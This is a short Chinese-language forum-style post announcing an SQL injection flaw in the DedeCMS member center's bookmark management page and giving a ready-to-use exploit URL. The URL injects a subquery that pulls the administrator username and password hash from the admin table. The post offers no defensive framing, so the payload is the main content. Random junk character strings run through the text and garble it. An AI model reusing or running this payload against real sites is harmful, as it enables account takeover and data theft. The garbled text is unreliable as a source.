DedeCMS会员中心SQL注射漏洞; Y0 m/ L) A. E' ~ v
需要magic_quotes_gpc = Off
0 {/ h/ \( C. X: i3 c, e会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.' f7 R' _' E$ r9 |: _+ S( W) E
' q+ g& h: I. x6 G) r. E* jDedeCMS会员中心书签管理SQL注射漏洞, }& u! D& Z+ j, K! @
成功利用该漏洞可获得管理员密码
2 a. t. K# q( x, \0 @7 z! N, B4 ?
- J1 G4 C4 f3 J+ ^' T: S会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
" @, q9 N# f! w% ?( H
, ?4 d' N5 T7 ^0 R8 V: Bhttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r: `0 q3 H- ~: @+ Y) L
|